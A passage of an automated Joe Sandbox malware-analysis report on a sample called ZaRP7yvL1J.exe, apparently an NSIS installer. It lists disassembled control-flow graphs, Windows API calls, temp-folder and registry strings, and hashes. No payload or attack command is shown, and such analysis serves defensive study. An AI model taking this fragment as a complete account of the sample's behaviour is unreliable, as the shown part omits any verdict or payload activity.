                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-2335571965
                                                                                                            • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 446 4031cf-4031d3 443->446 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->446 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 491 4030df-4030e5 462->491 488 403139-40313e 463->488 489 40314d-40317d call 40345d call 4031d6 463->489 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 487 40300e-403015 470->487 473->474 479 403087-403095 call 4068b5 474->479 480 403098-4030a2 474->480 479->480 480->452 480->453 487->474 490 403017-40301e 487->490 488->446 500 403182-403185 489->500 490->474 493 403020-403027 490->493 491->459 491->463 493->474 495 403029-403030 493->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->446
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ZaRP7yvL1J.exe,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ZaRP7yvL1J.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\ZaRP7yvL1J.exe,C:\Users\user\Desktop\ZaRP7yvL1J.exe,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\ZaRP7yvL1J.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-4073398900
                                                                                                            • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 518 406457-40645e 514->518 516 406662-40666d 515->516 517 406463-406470 515->517 520 406678-406679 516->520 521 40666f-406673 call 4063e8 516->521 517->516 519 406476-406482 517->519 518->515 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 536 4064f7-4064fe 529->536 530->529 533 4064e0-4064e3 530->533 534 406602-40660e call 4063e8 531->534 535 4065f4-406600 call 40632f 531->535 537 406630-406641 lstrlenW 532->537 538 406623-40662b call 40640a 532->538 533->529 540 4064e5-4064e8 533->540 549 406613-406619 534->549 535->549 542 406500-406502 536->542 543 406503-406505 536->543 537->515 538->537 540->529 545 4064ea-4064ee 540->545 542->543 547 406540-406543 543->547 548 406507-40652e call 4062b6 543->548 545->536 550 406553-406556 547->550 551 406545-406551 GetSystemDirectoryW 547->551 561 406534-40653b call 40640a 548->561 562 4065ce-4065d1 548->562 549->537 553 40661b 549->553 555 4065c1-4065c3 550->555 556 406558-406566 GetWindowsDirectoryW 550->556 554 4065c5-4065c9 551->554 558 4065de-4065e4 call 40667c 553->558 554->558 563 4065cb 554->563 555->554 560 406568-406572 555->560 556->555 558->537 566 406574-406577 560->566 567 40658c-4065a2 SHGetSpecialFolderLocation 560->567 561->554 562->558 564 4065d3-4065d9 lstrcatW 562->564 563->562 564->558 566->567 570 406579-406580 566->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 567->571 572 4065bd 567->572 573 406588-40658a 570->573 571->554 571->572 572->555 573->554 573->567
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-1230650788
                                                                                                            • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 662 4017dd-4017ef 654->662 663 4017cd-4017db CompareFileTime 654->663 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 662->655 663->662 668 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->668 669 40186f-401879 call 405450 665->669 679 4018b8-4018bc 666->679 680 4018be-4018ca SetFileTime 666->680 668->653 701 401864-401865 668->701 681 401882-401888 669->681 679->680 684 4018d0-4018db CloseHandle 679->684 680->684 682 402ace 681->682 688 402ad0-402ad4 682->688 686 4018e1-4018e4 684->686 687 402ac5-402ac8 684->687 690 4018e6-4018f7 call 40640a lstrcatW 686->690 691 4018f9-4018fc call 40640a 686->691 687->682 697 401901-4022fc call 405a4e 690->697 691->697 697->688 701->681 703 401867-401868 701->703 703->669
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nszB803.tmp$C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-56505902
                                                                                                            • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 712 4027dc-4027e4 711->712 713 40267e-40268d call 406348 711->713 712->707 713->712 717 402693 713->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 722 402737-40273a 719->722 723 40274d-40275d call 405f61 719->723 720->712 721 4026c4-4026c9 720->721 721->712 726 4026cf-4026dd 721->726 722->723 724 40273c-402747 call 405fbf 722->724 723->712 732 40275f 723->732 724->712 724->723 729 4026e3-4026f5 MultiByteToWideChar 726->729 730 402798-4027a4 call 40632f 726->730 729->732 733 4026f7-4026fa 729->733 730->709 735 402762-402765 732->735 736 4026fc-402707 733->736 735->730 738 402767-40276c 735->738 736->735 739 402709-40272e SetFilePointer MultiByteToWideChar 736->739 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->736 742 402730 739->742 743 4027ca-4027d6 SetFilePointer 740->743 744 4027af-4027b3 740->744 741->740 745 402775-402788 741->745 742->732 743->712 746 4027b5-4027b9 744->746 747 4027bb-4027c8 744->747 745->712 748 40278a-402790 745->748 746->743 746->747 747->712 748->718 749 402796 748->749 749->712
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 757 6f951777-6f9517b6 call 6f951b5f 761 6f9518d6-6f9518d8 757->761 762 6f9517bc-6f9517c0 757->762 763 6f9517c2-6f9517c8 call 6f952352 762->763 764 6f9517c9-6f9517d6 call 6f952394 762->764 763->764 769 6f951806-6f95180d 764->769 770 6f9517d8-6f9517dd 764->770 771 6f95182d-6f951831 769->771 772 6f95180f-6f95182b call 6f952569 call 6f9515b4 call 6f951272 GlobalFree 769->772 773 6f9517df-6f9517e0 770->773 774 6f9517f8-6f9517fb 770->774 778 6f951833-6f95187c call 6f9515c6 call 6f952569 771->778 779 6f95187e-6f951884 call 6f952569 771->779 795 6f951885-6f951889 772->795 776 6f9517e2-6f9517e3 773->776 777 6f9517e8-6f9517e9 call 6f952aac 773->777 774->769 780 6f9517fd-6f9517fe call 6f952d37 774->780 783 6f9517e5-6f9517e6 776->783 784 6f9517f0-6f9517f6 call 6f952724 776->784 791 6f9517ee 777->791 778->795 779->795 788 6f951803 780->788 783->769 783->777 794 6f951805 784->794 788->794 791->788 794->769 799 6f9518c6-6f9518cd 795->799 800 6f95188b-6f951899 call 6f95252c 795->800 799->761 805 6f9518cf-6f9518d0 GlobalFree 799->805 807 6f9518b1-6f9518b8 800->807 808 6f95189b-6f95189e 800->808 805->761 807->799 810 6f9518ba-6f9518c5 call 6f95153d 807->810 808->807 809 6f9518a0-6f9518a8 808->809 809->807 811 6f9518aa-6f9518ab FreeLibrary 809->811 810->799 811->807
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F951B5F: GlobalFree.KERNEL32(?), ref: 6F951DB2
                                                                                                              • Part of subcall function 6F951B5F: GlobalFree.KERNEL32(?), ref: 6F951DB7
                                                                                                              • Part of subcall function 6F951B5F: GlobalFree.KERNEL32(?), ref: 6F951DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F951825
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 6F9518AB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F9518D0
                                                                                                              • Part of subcall function 6F952352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F952383
                                                                                                              • Part of subcall function 6F952724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F9517F6,00000000), ref: 6F9527F4
                                                                                                              • Part of subcall function 6F9515C6: wsprintfW.USER32 ref: 6F9515F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                            • Opcode ID: faee48dba62b45d97be3b2184bd75426573d35928ae35b5260f729c95c63ae8d
                                                                                                            • Instruction ID: 15b51909478f2244a7f0ecf7831802babf67c068503d3ee08ed1dc0f181b3e29
                                                                                                            • Opcode Fuzzy Hash: faee48dba62b45d97be3b2184bd75426573d35928ae35b5260f729c95c63ae8d
                                                                                                            • Instruction Fuzzy Hash: FF418E71404304AAEB24DF789884B9637ACBF07328F144566EA199E1D7DB79E0F9CB60

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 814 4023e4-402415 call 402c41 * 2 call 402cd1 821 402ac5-402ad4 814->821 822 40241b-402425 814->822 823 402427-402434 call 402c41 lstrlenW 822->823 824 402438-40243b 822->824 823->824 827 40243d-40244e call 402c1f 824->827 828 40244f-402452 824->828 827->828 832 402463-402477 RegSetValueExW 828->832 833 402454-40245e call 4031d6 828->833 836 402479 832->836 837 40247c-40255d RegCloseKey 832->837 833->832 836->837 837->821 839 40288b-402892 837->839 839->821
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nszB803.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszB803.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nszB803.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nszB803.tmp
                                                                                                            • API String ID: 2655323295-789845483
                                                                                                            • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                            • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
